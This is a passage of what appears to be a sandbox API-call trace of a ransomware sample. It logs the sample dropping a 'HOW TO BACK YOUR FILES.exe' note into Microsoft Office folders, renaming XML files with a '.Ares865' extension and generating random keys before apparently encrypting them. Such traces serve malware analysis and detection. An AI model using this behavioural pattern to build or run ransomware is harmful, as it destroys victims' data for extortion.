Office\\Office14\\PROOF") returned="C:\\Program Files\\Microsoft Office\\Office14\\PROOF" [0067.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4a20 | out: hHeap=0x2b0000) returned 1 [0067.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0067.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PROOF") returned 48 [0067.969] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PROOF") returned="C:\\Program Files\\Microsoft Office\\Office14\\PROOF" [0067.969] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.969] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.981] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5481df0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a04fa20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a04fa20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.981] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.981] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082") returned="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082" [0067.982] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.982] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0067.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082") returned 53 [0067.982] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082") returned="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082" [0067.982] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.982] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\3082\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.986] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.986] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\3082\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a075b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a075b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.986] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.986] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.986] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036") returned="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036" [0067.987] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.987] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0067.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036") returned 53 [0067.987] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036") returned="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036" [0067.987] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.987] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\1036\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.990] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.991] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa44929a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5a075b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a075b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.991] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.991] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.991] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033" [0067.991] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.991] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0067.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033") returned 53 [0067.991] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033" [0067.991] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.991] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.995] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.995] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97285f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a075b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a075b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.995] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.995] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.995] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE") returned="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE" [0067.995] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e49b0 | out: hHeap=0x2b0000) returned 1 [0067.995] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0067.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE") returned 51 [0067.996] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE") returned="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE" [0067.996] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.996] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\how to back your files.exe"), bFailIfExists=1) returned 1 [0068.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.002] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d27370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a09bce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a09bce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0068.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0068.002] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL001.XML.Ares865") returned 72 [0068.002] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL001.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl001.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL001.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl001.xml.ares865"), dwFlags=0x1) returned 1 [0068.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL001.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl001.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.003] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4022) returned 1 [0068.003] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0068.004] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.004] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.007] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0068.008] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.008] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.009] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL002.XML.Ares865") returned 72 [0068.009] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL002.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl002.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL002.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl002.xml.ares865"), dwFlags=0x1) returned 1 [0068.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL002.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl002.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.009] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1421818) returned 1 [0068.009] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0068.010] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.010] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.156] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0068.157] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.157] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.200] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL010.XML.Ares865") returned 72 [0068.200] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL010.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl010.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL010.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl010.xml.ares865"), dwFlags=0x1) returned 1 [0068.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL010.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl010.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.254] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=211482) returned 1 [0068.263] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.267] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.267] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.288] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0068.289] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.289] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.292] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL011.XML.Ares865") returned 72 [0068.292] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL011.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl011.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL011.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl011.xml.ares865"), dwFlags=0x1) returned 1 [0068.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL011.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl011.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.293] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5008) returned 1 [0068.293] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0068.294] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.294] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.296] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0068.296] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.296] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.297] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL012.XML.Ares865") returned 72 [0068.297] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL012.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl012.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL012.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl012.xml.ares865"), dwFlags=0x1) returned 1 [0068.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL012.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl012.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.298] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=676216) returned 1 [0068.298] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0068.299] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.299] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.328] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0068.329] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.329] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0068.351] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL016.XML.Ares865") returned 72 [0068.351] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL016.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl016.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL016.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl016.xml.ares865"), dwFlags=0x1) returned 1 [0068.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL016.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl016.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.352] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=142576) returned 1 [0068.353] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.363] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.363] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.426] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0068.427] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.427] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.429] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL020.XML.Ares865") returned 72 [0068.429] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL020.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl020.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL020.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl020.xml.ares865"), dwFlags=0x1) returned 1 [0068.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL020.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl020.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.430] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=65980) returned 1 [0068.430] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0068.431] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.431] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0068.500] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0068.502] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.502] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0068.525] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL022.XML.Ares865") returned 72 [0068.526] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL022.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl022.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL022.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl022.xml.ares865"), dwFlags=0x1) returned 1 [0068.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL022.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl022.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0068.539] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=150682) returned 1 [0068.539] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0068.540] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0068.540] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.558] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0068.559] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0068.559] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.561] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL026.XML.Ares865") returned 72 [0068.561] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL026.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl026.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL026.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl026.xml.ares865"), dwFlags=0x1) returned 1 [0068.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL026.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl026.xml.ares865"), 